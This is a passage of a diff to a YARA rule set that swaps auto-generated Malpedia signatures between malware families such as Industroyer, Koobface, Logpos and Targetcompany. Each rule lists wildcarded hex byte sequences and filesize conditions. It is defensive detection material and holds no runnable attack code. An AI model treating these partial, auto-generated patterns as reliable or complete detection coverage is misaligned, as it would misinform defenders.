$sequence_3 = { 8944240c c7442408???????? 89542404 8b45f4 890424 } - $sequence_4 = { c705????????00000000 c705????????00000000 e8???????? 85c0 7439 8d859ceaffff 89442410 } - $sequence_5 = { c745c400000000 e9???????? c744241c00000000 c744241800000000 c744241403000000 c744241000000000 } - $sequence_6 = { 83bdd4ebffff00 750c c7042401000000 e8???????? } - $sequence_7 = { 8b8558efffff 890424 e8???????? 83ec08 81bde8efffff03010000 7405 } - $sequence_8 = { 89c6 31d6 31ce 0375d8 01f3 81eb1b662419 c1c30b } - $sequence_9 = { 40 890424 e8???????? 8945fc 8b45fc 89442408 8b450c } + $sequence_0 = { eb58 833f00 7651 8b5f08 } + $sequence_1 = { 8b3a 3b7d08 740a 40 } + $sequence_2 = { 8d443604 50 a1???????? 57 } + $sequence_3 = { 8d442440 50 8d442428 50 0fb64304 } + $sequence_4 = { 8d442448 50 ff15???????? 0fb744244e } + $sequence_5 = { 8d4c3110 81f90000a000 7715 8918 c7400400000200 89780c } + $sequence_6 = { 8918 c7400400000200 89780c ff4208 890a c645ff01 } + $sequence_7 = { 8d442460 50 e8???????? 8b4508 } + $sequence_8 = { e8???????? 84c0 7442 6a10 } + $sequence_9 = { 891d???????? 891d???????? ffd6 68???????? } + $sequence_10 = { 8bf3 6810270000 ff35???????? ff15???????? } + $sequence_11 = { 8d8db0fdffff e8???????? 8ad8 84db } + $sequence_12 = { 8ac3 5b c20800 55 8bec 83e4f8 } + $sequence_13 = { c9 c20400 55 8bec f6451802 } + $sequence_14 = { 56 ff15???????? 5e 8ac3 5b c20800 } + $sequence_15 = { 84c0 0f84ac000000 b809080002 3945f4 7713 807d0801 0f8598000000 } + $sequence_16 = { 0f86e3000000 8b03 3509080002 3d5c5b4550 740b 3d59495351 } + $sequence_17 = { c745f809080002 e8???????? 8ad8 f6450c04 7473 } + $sequence_18 = { 807b0244 7429 83fe04 0f82ec000000 8b1b 81f309080002 81fb5d515047 } + $sequence_19 = { ff35???????? e8???????? 5f 5e 8ac3 } + $sequence_20 = { 8d470c 50 c707000e0000 c7470809080002 } + $sequence_21 = { b8d5000000 e8???????? 68e6010000 68???????? 6809080002 8bc6 50 } + $sequence_22 = { 81fb5d515047 7410 81fb4f4d4156 7408 81fb59495354 7506 b364 } + $sequence_23 = { 81fb59495354 7506 b364 6a14 eb18 81fb5a5c4156 740c } condition: - 7 of them and filesize <81920 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Industroyer_Auto : FILE +rule MALPEDIA_Win_Koobface_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9c6bfb9f-c466-5000-a18a-b1782556f295" + id = "1ce15537-cef6-5c0e-a9d8-b5edfbbc6020" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industroyer_auto.yar#L1-L379" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.koobface_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "10be42e3e137c59c80c36fac63f4d878185befa45cbf0b3714b0e9925e862e84" + logic_hash = "b6b79af3be74d0a2238bfa51c4162b8333d68f5a5fb85b02563c06855a5cb17a" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -155604,62 +158518,32 @@ rule MALPEDIA_Win_Industroyer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 50 ff750c ff15???????? 8d45fc 50 8d45f8 } - $sequence_1 = { 68f4010000 ff15???????? 33c0 50 } - $sequence_2 = { 50 8945e0 e8???????? 8945f8 e8???????? 50 8945e4 } - $sequence_3 = { 6808020000 50 ff7710 ff15???????? } - $sequence_4 = { ff7710 6a03 56 e8???????? 83c424 894708 85c0 } - $sequence_5 = { ff15???????? 8bd8 8d8598fdffff 6804010000 50 68???????? ff15???????? } - $sequence_6 = { 6a02 50 53 68000000c0 56 c745f40c000000 895dfc } - $sequence_7 = { 6a4c e8???????? 8bf0 8d8510ffffff 6a4c } - $sequence_8 = { 8bf9 ff15???????? 3bf8 0f84bb000000 } - $sequence_9 = { 8b7508 ff7604 8b06 ffd0 56 e8???????? } - $sequence_10 = { ffd6 85c0 7431 ff35???????? } - $sequence_11 = { 8bd8 85db 0f849d000000 8d85d0fdffff c785d0fdffff2c020000 50 53 } - $sequence_12 = { 683f010f00 6a00 8d85a0f3ffff 50 6802000080 ff15???????? 85c0 } - $sequence_13 = { 85c0 0f85bb000000 6800020000 8d85a0fbffff 50 } - $sequence_14 = { bfffff0000 0f46f9 3d00005000 b900400000 } - $sequence_15 = { 8d8c2468020000 e8???????? 8d442418 50 ff742414 ff15???????? } - $sequence_16 = { eb07 8b0cc5dc084100 894de4 85c9 } - $sequence_17 = { 0f8501010000 c745e0e4ff4000 8b4508 8bcf } - $sequence_18 = { 6a0a 8854382a 8b048dd01f0210 8874382b 8b048dd01f0210 5a } - $sequence_19 = { 0f8580000000 8b4508 dd00 ebc6 c745e0e8ff4000 } - $sequence_20 = { 6689823e020000 0fb68340020000 888240020000 8d8344020000 50 e8???????? } - $sequence_21 = { 50 ff15???????? 6a02 ff15???????? 50 ffd6 ff770c } - $sequence_22 = { 0fb605???????? 88413e 0f1005???????? 0f118133010000 a1???????? 898143010000 } - $sequence_23 = { 83e901 740d 83e902 7521 } - $sequence_24 = { 660f28b820004100 660f54f0 660f5cc6 660f59f4 660f5cf2 f20f58fe } - $sequence_25 = { 807b0100 0f85fc000000 a840 0f85d5000000 ff35???????? ff15???????? } - $sequence_26 = { 89422c 0fb64330 884230 0fb64331 884231 0fb64332 } - $sequence_27 = { 746a ff7508 8b15???????? 51 8bcb e8???????? } - $sequence_28 = { 85c0 7450 6aff 56 ff15???????? } - $sequence_29 = { ba???????? 0f94c1 884b32 84c9 a1???????? f30f7e05???????? } - $sequence_30 = { 8b442418 89442440 8d44243c 50 ff15???????? 50 } - $sequence_31 = { ff15???????? 68???????? ff15???????? 85c0 7417 68???????? } - $sequence_32 = { 83c410 84c0 0f84b9010000 8b8520ffffff 8bbd1cffffff 2bc7 } - $sequence_33 = { 8d4dc8 ff30 e8???????? 8d4d84 83ff02 0f86a4000000 } - $sequence_34 = { e8???????? 6a00 56 8d8d08feffff e8???????? } - $sequence_35 = { 8bce 8907 53 894704 e8???????? 8b4308 } - $sequence_36 = { 53 8b1c85205e4400 56 6800080000 } - $sequence_37 = { 8945e4 8d83bc000000 50 e8???????? 6a28 e8???????? } - $sequence_38 = { 0fb7c1 8945f8 3905???????? 7f26 663b4df4 7320 } - $sequence_39 = { 33c5 8945fc 8365e000 53 8b5d0c 56 } + $sequence_0 = { 8d850cffffff 50 c745fc26000000 e8???????? 834dfcff 53 } + $sequence_1 = { e8???????? 33db 59 889dfaf7ffff 889dfbf7ffff 899decf7ffff 899de0f7ffff } + $sequence_2 = { 83bd34c1ffff0a 754c 8d8540c1ffff 6a41 50 } + $sequence_3 = { 50 c745cc5cd74100 e8???????? 8b7508 bf63736de0 393e 0f85a5010000 } + $sequence_4 = { e8???????? 50 8d8538f4ffff 50 e8???????? 8b8520f4ffff 59 } + $sequence_5 = { e8???????? 8b8598faffff c1e803 50 8d85a4faffff 57 50 } + $sequence_6 = { 8d8528ffffff 68???????? 50 e8???????? 83c40c 8d8528ffffff 50 } + $sequence_7 = { 8d8528ffffff 50 e8???????? 68???????? 8d850857ffff } + $sequence_8 = { 8d4de4 51 53 ff90e0000000 837de404 7407 } + $sequence_9 = { 68???????? e8???????? 59 57 e8???????? 59 8b4dfc } condition: - 7 of them and filesize <983040 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Grey_Energy_Auto : FILE +rule MALPEDIA_Win_Logpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4a36cbdc-dd01-583b-ac49-dd33a3c83ba9" + id = "1863375d-233c-50fe-9230-efcb27bcbb2c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grey_energy_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.logpos_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "48bebd474d43043ec7179ca6aa1110529eaa285ee6fd70578731385cb5b6f92e" + logic_hash = "c3acfde126a6fa182645fe56f6caf8ed6c2b8f53215730338bb39d48d6bd3dac" score = 75 quality = 75 tags = "FILE" @@ -155673,39 +158557,32 @@ rule MALPEDIA_Win_Grey_Energy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6800000008 57 53 53 } - $sequence_1 = { e8???????? 68???????? 8945cc e8???????? 68???????? 8945d4 e8???????? } - $sequence_2 = { 53 53 6800000008 57 } - $sequence_3 = { 8945d4 e8???????? 68???????? 8945d0 e8???????? } - $sequence_4 = { 0345f0 0fbe08 8b45f0 33d2 } - $sequence_5 = { 81e1ff000000 8b45ec 8b55f8 66890c42 } - $sequence_6 = { 8b45f8 0345ec 8808 eb10 } - $sequence_7 = { 8b55f0 8b7508 668b1456 66891441 } - $sequence_8 = { 66890c42 eb14 8b45ec 8b4df8 } - $sequence_9 = { 53 ff15???????? 8b75f8 85f6 } - $sequence_10 = { 8b4d08 0fb70c41 8b45f0 33d2 } - $sequence_11 = { 50 6a40 ff15???????? 8945f8 837df800 7507 } - $sequence_12 = { 837df800 7507 33c0 e9???????? c745f004000000 } - $sequence_13 = { 7407 c60100 41 48 75f9 ff75f8 } - $sequence_14 = { 48 75fa 56 ff15???????? ff75f8 } - $sequence_15 = { 57 ff75e8 ff75f0 ffd6 } - $sequence_16 = { e8???????? 8b4508 3bc7 7430 57 } + $sequence_0 = { 89e5 0fb64508 83f830 0f8c13000000 83f839 0f8f0a000000 } + $sequence_1 = { 89ec 5d c3 55 89e5 83ec20 53 } + $sequence_2 = { 884c2408 0fb6442408 83f841 0f8c09000000 83f85a 0f8e37000000 0fb6442408 } + $sequence_3 = { 53 e8???????? 894330 682a5a9294 ff33 ff7370 } + $sequence_4 = { 8b4d10 8a450c 8b7d08 fc f3aa 61 } + $sequence_5 = { ff9380000000 48 83c420 48 85f6 7409 48 } + $sequence_6 = { c785f8fbffff01000000 68f4010000 ff15???????? 0fb69507fcffff b90f000000 } + $sequence_7 = { 83f800 0f8537000000 833d????????00 0f852a000000 837d1400 0f848c000000 } + $sequence_8 = { 5a c9 c3 41 52 } + $sequence_9 = { 0f8549000000 8b45fc c680a360400000 8b45fc } condition: - 7 of them and filesize <303104 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Unidentified_094_Auto : FILE +rule MALPEDIA_Win_Targetcompany_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f5bdd8f3-d974-5222-9555-3631072a29c0" + id = "e6fff5d7-7001-551f-9dad-753a10f6e88e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_094_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.targetcompany_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7" + logic_hash = "a6f3e9a1f1d0d374d374e6c7006eb751526bddf3371b115cfe046f8accd1d439" score = 75 quality = 75 tags = "FILE" @@ -155719,32 +158596,32 @@ rule MALPEDIA_Win_Unidentified_094_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? } - $sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 } - $sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? } - $sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f } - $sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 } - $sequence_5 = { 884dff 84d2 7902 341b } - $sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 } - $sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 } - $sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b } - $sequence_9 = { 890d???????? 57 8915???????? a3???????? } + $sequence_0 = { ff15???????? 85c0 7475 fe85a7fdffff 80bda7fdffff0c } + $sequence_1 = { 53 ff15???????? ff75e8 ff15???????? ff75e0 ff15???????? 3975f0 } + $sequence_2 = { eb43 b900100000 3bc1 733a 53 51 } + $sequence_3 = { 83c424 33cd 33c0 5f e8???????? c9 c3 } + $sequence_4 = { 813d????????a9aaaa0a 722b 68???????? 8d4dd4 } + $sequence_5 = { e8???????? 57 6a0c 5a 8bce 8d45e0 e8???????? } + $sequence_6 = { 83ec40 53 56 33f6 57 8d5dc4 } + $sequence_7 = { 50 8d45b0 50 e8???????? 8d45b0 50 8d85c0feffff } + $sequence_8 = { bf???????? 8d75e8 e8???????? 8b1d???????? 8d75f0 } + $sequence_9 = { 8945ec e8???????? 53 6a01 8d758c e8???????? 53 } condition: - 7 of them and filesize <524288 + 7 of them and filesize <328704 } -rule MALPEDIA_Win_Sneepy_Auto : FILE +rule MALPEDIA_Win_Thunderx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "92a9a098-af3e-565a-a77d-ae1e4fe61438" + id = "bd791591-7f4e-54f3-bf78-0dd306ad53b2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sneepy_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thunderx_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "0102a60e328cb3b8b2c7928ec4f988725df8b07a3b2131190567958f6bfcc033" + logic_hash = "088c8f2e806c5cf8226a8db8f2cdc4a3ddd2da7bdf68b4f2265db3773cd1c842" score = 75 quality = 75 tags = "FILE" @@ -155758,32 +158635,32 @@ rule MALPEDIA_Win_Sneepy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c40c 33c0 8a8810234100 } - $sequence_1 = { 83f8ff 0f85abfeffff 5f 5e } - $sequence_2 = { 8945e4 8845e8 e8???????? 8d55e4 83c404 2bd0 8a08 } - $sequence_3 = { ffd6 85c0 740d 8b85b8feffff 50 ffd6 } - $sequence_4 = { e8???????? 83c40c 32c0 5e 8b4dfc } - $sequence_5 = { 68???????? 8945f4 8845f8 e8???????? 8d55f4 83c404 } - $sequence_6 = { ff15???????? 8bc8 8a10 40 } - $sequence_7 = { 33c0 8b4d08 3b0cc520de4000 740a 40 83f816 72ee } - $sequence_8 = { 668b0d???????? 8a15???????? 668908 6a50 } - $sequence_9 = { 33c0 8945e4 83f805 7d10 668b4c4310 66890c4514314100 } + $sequence_0 = { 50 e8???????? c9 c3 c705????????58004200 b001 c3 } + $sequence_1 = { b9???????? e8???????? 0fb60d???????? 84c0 6a01 58 0f45c8 } + $sequence_2 = { 51 53 8b5d10 8bd1 56 57 8955fc } + $sequence_3 = { 8d8d9cfbffff e8???????? 8d8d84fbffff e8???????? 8d8d6cfbffff e8???????? } + $sequence_4 = { 6a02 8d44241c 895c2424 50 53 53 } + $sequence_5 = { e8???????? 84c0 7558 83c718 3b7da0 75ea 8d4de0 } + $sequence_6 = { 89459c 8945a0 e8???????? 84c0 0f858d000000 395f10 } + $sequence_7 = { 03d1 8b0c85701b4200 8a0433 43 88440a2e 8b4dd8 8b55b4 } + $sequence_8 = { 8932 897204 897208 5e 5d c20400 6a18 } + $sequence_9 = { 8d8dd0fdffff e8???????? 8d4dac c645fc06 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Shareip_Auto : FILE +rule MALPEDIA_Win_Grok_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1e2be420-f7e3-538b-a25d-892f460d058e" + id = "870cf4c1-459b-52f4-a686-b281f5585948" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shareip_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grok_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "22b55834a3d563030497f1fde153bdd0a045ee32bc87427f1091c9e8cd08bbb9" + logic_hash = "f55e3b1924db1bff1757dac784f11d8f8a3020681a2893ba57b274944ef08137" score = 75 quality = 75 tags = "FILE" @@ -155797,32 +158674,32 @@ rule MALPEDIA_Win_Shareip_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8534feffff e9???????? 8d8da8feffff e9???????? 8d8558feffff e9???????? 8d8544ffffff } - $sequence_1 = { 894638 85c9 740f 8bd0 8d4900 8a01 8802 } - $sequence_2 = { 8a8064954500 08443b1d 0fb64601 47 3bf8 76ea 8b7d08 } - $sequence_3 = { 395c2444 7426 3bc3 7422 50 e8???????? 8b4c2444 } - $sequence_4 = { 834dfcff 894614 83c40c 8d45e4 50 e8???????? 8b07 } - $sequence_5 = { 8b44241c 50 8d8c24a0010000 51 53 53 53 } - $sequence_6 = { 55 8d4c245c e8???????? 8bd8 895c2414 83fbff 7541 } - $sequence_7 = { 837de800 7e50 8b03 8b4804 0fb7541930 8d0419 8b4828 } - $sequence_8 = { 8b9a80f34400 33f3 8b4538 33db 8b553c 33c6 33d6 } - $sequence_9 = { 33c0 eb05 1bc0 83d8ff 3bc3 7506 895c2418 } + $sequence_0 = { 39702c 7413 56 ff702c ffd3 a1???????? 89702c } + $sequence_1 = { 7c62 a1???????? 397044 7412 56 ff7044 ff15???????? } + $sequence_2 = { 51 57 50 e8???????? 83c40c 57 53 } + $sequence_3 = { 33ff 897dd8 81ff00010000 7d28 8d0c17 8b4514 03c7 } + $sequence_4 = { a1???????? 895820 a1???????? 395824 } + $sequence_5 = { 894df4 eb09 8b55f4 83c201 8955f4 8b45f8 83c009 } + $sequence_6 = { 5f 56 56 6a22 6a01 56 } + $sequence_7 = { 50 e8???????? 3bc3 7d7e 395d08 7479 3d430000c0 } + $sequence_8 = { 33ff 47 3bc3 8945fc 0f8c9c000000 391d???????? 7410 } + $sequence_9 = { 53 51 03c6 50 e8???????? 8b463c 8d8c3080000000 } condition: - 7 of them and filesize <811008 + 7 of them and filesize <84992 } -rule MALPEDIA_Win_Shimrat_Auto : FILE +rule MALPEDIA_Win_Dircrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9f2cf600-46fb-5fe2-9403-91a4ffe5dc91" + id = "b395b5b7-d790-5f9f-ab3c-658138d51b34" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shimrat_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dircrypt_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "4e378ef30b6703953f18ff74f4c2d2ea366c27ea22af1636e2d889f102c09783" + logic_hash = "9b92693268fddc2e1dd801012d692fa19a40b6fbb8b33ec64e384964127e0228" score = 75 quality = 75 tags = "FILE" @@ -155836,32 +158713,32 @@ rule MALPEDIA_Win_Shimrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 59 59 6a01 8d452c } - $sequence_1 = { eb1a 83f802 7513 83ec0c 8d4660 8bcc 50 } - $sequence_2 = { ff7508 8d85fcfeffff 50 e8???????? 59 59 85c0 } - $sequence_3 = { ff15???????? 8d4df4 e8???????? 8d4d08 e8???????? 5e } - $sequence_4 = { e8???????? 59 59 895e1c ff15???????? 8bce 899ec0000000 } - $sequence_5 = { ff15???????? 8bce 899ec0000000 e8???????? 85c0 750e } - $sequence_6 = { 837d0800 7424 837d0c00 741e ff7510 ff750c } - $sequence_7 = { 50 8bce e8???????? 85c0 74d9 ff75e8 8d4df0 } - $sequence_8 = { 6a00 68???????? 53 ffd7 ff7570 ff15???????? e9???????? } - $sequence_9 = { 83c414 50 8d4f6c e8???????? } + $sequence_0 = { 7531 c705????????01000000 e8???????? e8???????? 833d????????00 7514 68???????? } + $sequence_1 = { e8???????? e8???????? 68???????? ff15???????? 833d????????00 751a } + $sequence_2 = { 68???????? e8???????? 05d2070000 50 e8???????? a3???????? 6a13 } + $sequence_3 = { 8bec 51 6a00 6a00 8d45fc 50 68???????? } + $sequence_4 = { 68???????? 8d45dc 50 e8???????? 6a00 e8???????? } + $sequence_5 = { 6801000080 e8???????? e8???????? e8???????? e8???????? } + $sequence_6 = { e8???????? 05d5070000 50 6a01 6a02 6a08 } + $sequence_7 = { 68???????? 8d45dc 50 e8???????? 6a00 e8???????? 05d6070000 } + $sequence_8 = { 833d????????00 7514 68???????? 68???????? e8???????? a3???????? 833d????????00 } + $sequence_9 = { 51 6a00 6a00 8d45fc 50 68???????? 6802000080 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <671744 } -rule MALPEDIA_Win_Rincux_Auto : FILE +rule MALPEDIA_Win_Quarterrig_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f27efa3f-a583-5935-b25f-3d309003cd7f" + id = "b690a4f4-b484-55ac-b058-10bc50927e69" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rincux_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quarterrig_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "bab1d2c8fa3084a76a95e14132fec6ddc959ff0aa0d14a5e81e01f5b29b7ad34" + logic_hash = "311b3b8ecf53c484bcc2dd986bb0e82467b08ff5a42c5d9fde578d475409e28c" score = 75 quality = 75 tags = "FILE" @@ -155875,33 +158752,33 @@ rule MALPEDIA_Win_Rincux_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 742d b9fa000000 33c0 8dbc24c0000000 8d9424c0000000 f3ab 8d8c24b0000000 } - $sequence_1 = { 8bcd 52 57 e8???????? 8b442410 8d4c2424 6a04 } - $sequence_2 = { 7425 8b442410 8d4c2424 88442424 } - $sequence_3 = { c68424fd00000076 888c24fe000000 888424ff000000 c68424000100005c c684240101000052 c684240201000044 c684240301000050 } - $sequence_4 = { c20800 33c0 8a4701 894614 8b4df4 64890d00000000 } - $sequence_5 = { ff15???????? 83f8ff 7511 8b16 52 ff15???????? 5f } - $sequence_6 = { 5e 83c42c c20400 8b542438 8d4c2408 51 52 } - $sequence_7 = { 84c0 74d8 5f 5e 5d 5b } - $sequence_8 = { 53 57 8b7c242c 6683f90e 7502 } - $sequence_9 = { 50 68???????? e9???????? 40 c745fc00000000 50 e8???????? } + $sequence_0 = { 32c0 e9???????? 8b15???????? 498bce ff15???????? 3d02010000 } + $sequence_1 = { 884597 33ff 897d9b 41f7411800400000 7528 410f1000 f30f7f45a7 } + $sequence_2 = { 4883c438 c3 488d0d53c10500 e8???????? 833d????????ff 75d2 c605????????01 } + $sequence_3 = { 65488b042558000000 ba04000000 488b0cc8 8b040a 3905???????? 7f19 488d0513cc0500 } + $sequence_4 = { 488b5590 4883fa10 720d 48ffc2 488b4c2478 e8???????? 4c896d88 } + $sequence_5 = { 488d0569fe0500 488b4c2448 4833cc e8???????? 0f28742460 0f287c2450 } + $sequence_6 = { eb3a e8???????? 4c8bc0 80780500 7429 33d2 } + $sequence_7 = { 4c89b690000000 4c89b698000000 0f108780000000 0f118680000000 0f108f90000000 0f118e90000000 4c89b790000000 } + $sequence_8 = { 4c8bcf 4533c0 488d5510 488d4c2478 e8???????? 83cb01 } + $sequence_9 = { 48895520 c744243402000000 41b840000000 458d78d0 418bd7 488d4d28 e8???????? } condition: - 7 of them and filesize <392192 + 7 of them and filesize <971776 } -rule MALPEDIA_Win_Meow_Auto : FILE +rule MALPEDIA_Win_Bhunt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3f4c85a0-7273-573d-9e5f-b6afea896e94" + id = "5486e0c5-654b-5b43-b68d-10c1b78a90c9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meow_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bhunt_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "0e149c089578c6685626f307f9368d702f8c85f1bb4a2cbda9a3a1cb6a651295" - score = 75 + logic_hash = "f1702c9f5cf7c98ee774218c3a385f625fff81483374971b8b6cf77e6b060de8" + score = 50 quality = 75 tags = "FILE" version = "1" @@ -155914,32 +158791,32 @@ rule MALPEDIA_Win_Meow_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c685cefaffff53 c685cffaffff63 c685d0faffff53 c685d1faffff53 c685d2faffff53 8a85c9faffff e8???????? } - $sequence_1 = { 72dc ff75ec 8d4599 50 e8???????? 8b33 ba0f000000 } - $sequence_2 = { 0f8441070000 c745f4bb195c00 be03000000 8b45f4 99 f7fe 85d2 } - $sequence_3 = { 99 f7f9 8b45f4 85d2 7403 48 eb01 } - $sequence_4 = { 743b 8b45f0 83c117 83c00b 99 f7f9 8945f0 } - $sequence_5 = { c685dbfdffff5f c685dcfdffff7d c685ddfdffff7d c685defdffff7d 8a85d5fdffff e8???????? 898564f5ffff } - $sequence_6 = { 7907 48 83c8fc 83c001 7463 8b4c2410 8d4303 } - $sequence_7 = { 8a01 8d4901 0fb6c0 83e871 6bc037 99 f7fb } - $sequence_8 = { c6854dfeffff4c c6854efeffff3b c6854ffeffff6b c68550feffff3b c68551feffff26 c68552feffff3b c68553feffff18 } - $sequence_9 = { 99 f7f9 85d2 7445 8b442410 8d4f17 83c00b } + $sequence_0 = { feca f8 d0c2 f5 f8 32da 80ffd4 } + $sequence_1 = { 85c0 751a 8b442410 50 8bd5 8bc3 e8???????? } + $sequence_2 = { 8902 660fbcc0 8b07 8dbf04000000 663bcf 66f7c4ab75 33c3 } + $sequence_3 = { bbff000000 8bc3 8d7c2414 66c784241e1200000800 e8???????? 59 8d8600120000 } + $sequence_4 = { 0fb7c2 8b55f0 03450c 2bd1 0fb74dfc } + $sequence_5 = { ff7304 c645d405 56 e8???????? ff7304 ff36 e8???????? } + $sequence_6 = { 83a530ffffff00 c7852cffffff01000000 ffb530ffffff ffb52cffffff 52 ffb544ffffff e8???????? } + $sequence_7 = { 5f 9c 04f8 26ed c59818579fa0 5f e7e6 } + $sequence_8 = { 52 3a21 a7 a2???????? 50 9d 03890023b0b3 } + $sequence_9 = { ac 2a7279 bfae9603f7 6c a3???????? 9f 97 } condition: - 7 of them and filesize <492544 + 7 of them and filesize <19161088 } -rule MALPEDIA_Win_Xpan_Auto : FILE +rule MALPEDIA_Win_Kerrdown_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7325c725-fe3e-5c78-bad6-69f44695968e" + id = "4e6c0456-511b-5ce5-b1ea-436b1b2f6672" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xpan_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kerrdown_auto.yar#L1-L121" 